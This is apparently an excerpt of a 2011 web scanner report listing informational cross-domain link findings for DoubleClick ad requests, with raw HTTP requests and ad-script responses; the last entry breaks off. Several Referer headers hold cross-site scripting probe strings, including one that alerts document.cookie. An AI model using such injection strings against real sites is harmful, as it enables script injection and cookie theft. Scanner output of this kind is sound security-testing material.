Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 16:41:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37394

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
ttp://pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=omd.55865628.&dcc=39972439.232434380&dcn=1"><IMG SRC="http://s0.2mdn.net/1361549/PID_1517494_math_728.jpg" width="728" height="90" BORDER=0 alt=""></A>
...[SNIP]...

17.65. http://ad.doubleclick.net/adj/N3340.trfu/B5083632.138 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3340.trfu/B5083632.138

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N3340.trfu/B5083632.138;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/;ord=1186435577?

The response contains the following link to another domain:

http://s0.2mdn.net/1361550/PID_1522107_cashbackapr_728.jpg

Request

GET /adj/N3340.trfu/B5083632.138;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/;ord=1186435577? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/js/thickbox.jsd2772'%3balert(1)//244e853bb28
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 16:41:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37765

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
PL9/http://pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=altima&dcp=zmm.57350078.&dcc=40424790.233402132"><IMG SRC="http://s0.2mdn.net/1361550/PID_1522107_cashbackapr_728.jpg" width="728" height="90" BORDER=0 alt=""></A>
...[SNIP]...

17.66. http://ad.doubleclick.net/adj/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=300x250;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/;ord=1114886567?

The response contains the following link to another domain:

http://s0.2mdn.net/1033942/PID_1493947_vw_2011_compare_jet_300x250.jpg

Request

GET /adj/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=300x250;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/;ord=1114886567? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 14:48:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 33610

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet"><IMG SRC="http://s0.2mdn.net/1033942/PID_1493947_vw_2011_compare_jet_300x250.jpg" width="300" height="250" BORDER=0 alt=""></A>
...[SNIP]...

17.67. http://ad.doubleclick.net/adj/N4506.interclick.com/B5098486.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4506.interclick.com/B5098486.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N4506.interclick.com/B5098486.2;sz=300x250;click=http://a1.interclick.com/icaid/126728/tid/53a4b2a2-fe8d-4a50-a3d0-7a39914bbdd1/click.ic?;ord=634318151090380217?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3021956/UTI_Auto_Legacy_ATT_300x250.jpg

Request

GET /adj/N4506.interclick.com/B5098486.2;sz=300x250;click=http://a1.interclick.com/icaid/126728/tid/53a4b2a2-fe8d-4a50-a3d0-7a39914bbdd1/click.ic?;ord=634318151090380217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 431
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:54:47 GMT
Expires: Sat, 29 Jan 2011 01:54:47 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/c/58/%2a/h;233972293;0-0;0;57757021;4307-300/250;39896058/39913845/1;;~sscs=%3fhttp://a1.interclick.com/icaid/126728/tid/53a4b2a2-fe8d-4a50-a3d0-7a39914bbdd1/click.ic?http%3a%2f%2fwww.uti.edu/Default.aspx%3Fadsource%3DID_IC_3x2_A_CT"><img src="http://s0.2mdn.net/viewad/3021956/UTI_Auto_Legacy_ATT_300x250.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.68. http://ad.doubleclick.net/adj/N4506.interclick.com/B5098486.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4506.interclick.com/B5098486.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N4506.interclick.com/B5098486.2;sz=300x250;click=http://a1.interclick.com/icaid/126728/tid/53a4b2a2-fe8d-4a50-a3d0-7a39914bbdd1/click.ic?;ord=634318151090380217?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3021956/UTI_Auto_Legacy_LTRE_300x250.jpg

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 17:37:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 432

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/c/58/%2a/j;233972293;2-0;0;57757021;4307-300/250;39896090/39913877/1;;~sscs=%3fhttp://a1.interclick.com/icaid/126728/tid/53a4b2a2-fe8d-4a50-a3d0-7a39914bbdd1/click.ic?http%3a%2f%2fwww.uti.edu/Default.aspx%3Fadsource%3DID_IC_3x2_A_CT"><img src="http://s0.2mdn.net/viewad/3021956/UTI_Auto_Legacy_LTRE_300x250.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.69. http://ad.doubleclick.net/adj/N4610.270478.AOLADVERTISINGADVER/B5087810.46 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4610.270478.AOLADVERTISINGADVER/B5087810.46

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N4610.270478.AOLADVERTISINGADVER/B5087810.46;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000952786/cstr=65504382=_4d434894,0873421211,766159%5E952786%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=65504382/optn=64?trg=;ord=0873421211?

The response contains the following link to another domain:

http://s0.2mdn.net/1477621/PID_1502754_300x250.jpg

Request

GET /adj/N4610.270478.AOLADVERTISINGADVER/B5087810.46;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000952786/cstr=65504382=_4d434894,0873421211,766159%5E952786%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=65504382/optn=64?trg=;ord=0873421211? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:52:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 48441

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
e.advertising.com/click/site=0000766159/mnum=0000952786/cstr=65504382=_4d434894,0873421211,766159%5E952786%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=65504382/optn=64?trg=http://www.facebook.com/3musketeers"><IMG id="IMG_'+ variableName +'" SRC="http://s0.2mdn.net/1477621/PID_1502754_300x250.jpg" width="300" height="250" BORDER=0 alt=""/></A>
...[SNIP]...

17.70. http://ad.doubleclick.net/adj/N6103.135388.BIZO/B5185769.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6103.135388.BIZO/B5185769.6

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N6103.135388.BIZO/B5185769.6;sz=728x90;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/b%3B235300643%3B0-0%3B0%3B59317886%3B3454-728/90%3B40364845/40382632/1%3Bu%3D%2Cbzo-57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B%7Esscs%3D%3f;ord=7630304?\

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3050873/1-Chris_Accountant_728x90.gif

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 779
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:40:06 GMT
Expires: Fri, 28 Jan 2011 16:40:06 GMT
Connection: close

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/4/130/%2a/j;235207729;0-0;0;59034359;3454-728/90;40334076/40351863/1;u=,bzo-57200543_1296226807,11d765b6a10b1b3,sport
...[SNIP]...
57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B%7Esscs%3D%3fhttp://www.supercutsfranchise.com"><img src="http://s0.2mdn.net/viewad/3050873/1-Chris_Accountant_728x90.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.71. http://ad.doubleclick.net/adj/N6103.135388.BIZO/B5185769.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6103.135388.BIZO/B5185769.6

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N6103.135388.BIZO/B5185769.6;sz=728x90;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/b%3B235300643%3B0-0%3B0%3B59317886%3B3454-728/90%3B40364845/40382632/1%3Bu%3D%2Cbzo-57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B~sscs%3D%3f;ord=7630304?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3050873/Jim_Pharmacist_728x90.gif

Request

GET /adj/N6103.135388.BIZO/B5185769.6;sz=728x90;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/b%3B235300643%3B0-0%3B0%3B59317886%3B3454-728/90%3B40364845/40382632/1%3Bu%3D%2Cbzo-57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B~sscs%3D%3f;ord=7630304? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 15:00:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 773

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/4/12e/%2a/j;235207729;1-0;0;59034359;3454-728/90;40362690/40380477/1;u=,bzo-57200543_1296226807,11d765b6a10b1b3,sport
...[SNIP]...
o-57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B~sscs%3D%3fhttp://www.supercutsfranchise.com"><img src="http://s0.2mdn.net/viewad/3050873/Jim_Pharmacist_728x90.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.72. http://ad.doubleclick.net/adj/cm.rev_bostonherald/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-15223392_1296252139,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=463717;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.47846851754002273?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2980124/NTXH_ClickNGo_300X250_generic_Q1.gif

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-15223392_1296252139,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=463717;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.47846851754002273? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:02:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1082

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/0/0/%2a/v;234604289;0-0;58;44779888;4307-300/250;40086868/40104655/1;u=,cm-15223392_1296252139,11d765b6a10b1b3,ent,cm
...[SNIP]...
cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;~aopt=2/0/ee/0;~sscs=%3fhttp://www.ntxhonda.com/"><img src="http://s0.2mdn.net/viewad/2980124/NTXH_ClickNGo_300X250_generic_Q1.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.73. http://ad.doubleclick.net/adj/cm.rev_bostonherald/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-51832465_1296253632,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=302941;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_l;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.9211412204895169?

The response contains the following link to another domain:

http://redcated/CRS/view/286443367/direct/01/902793

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-51832465_1296253632,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=302941;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_l;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.9211412204895169? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:27:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3769

document.write('<iframe src=\"http://view.atdmt.com/CRS/iview/286443367/direct/01/902793?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/o%3B234029658%3B0-0%3B2%3B44779888%3B4307-300/250%3
...[SNIP]...
%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3fhttp://clk.redcated/CRS/go/286443367/direct/01/902793" target="_blank"><img src="http://view.atdmt.com/CRS/view/286443367/direct/01/902793"/></a>
...[SNIP]...

17.74. http://ad.doubleclick.net/adj/cm.rev_bostonherald/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-61892947_1296253385,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.weath_l-cm.sports_h-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=54892;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_l;btg=cm.weath_l;btg=cm.sports_h;btg=cm.ent_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.6713631898164749?

The response contains the following link to another domain:

http://redcated/AVE/view/286764367/direct;wi.300;hi.250/01/655809

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-61892947_1296253385,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.weath_l-cm.sports_h-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=54892;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_l;btg=cm.weath_l;btg=cm.sports_h;btg=cm.ent_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.6713631898164749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:23:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3842

document.write('<iframe src=\"http://view.atdmt.com/AVE/iview/286764367/direct;wi.300;hi.250/01/655809?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/e%3B234367361%3B0-0%3B0%3B44779888%3B
...[SNIP]...
st7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_h%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3fhttp://clk.redcated/AVE/go/286764367/direct;wi.300;hi.250/01/655809" target="_blank"><img src="http://view.atdmt.com/AVE/view/286764367/direct;wi.300;hi.250/01/655809"/></a>
...[SNIP]...

17.75. http://ad.doubleclick.net/adj/cm.rev_bostonherald/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:

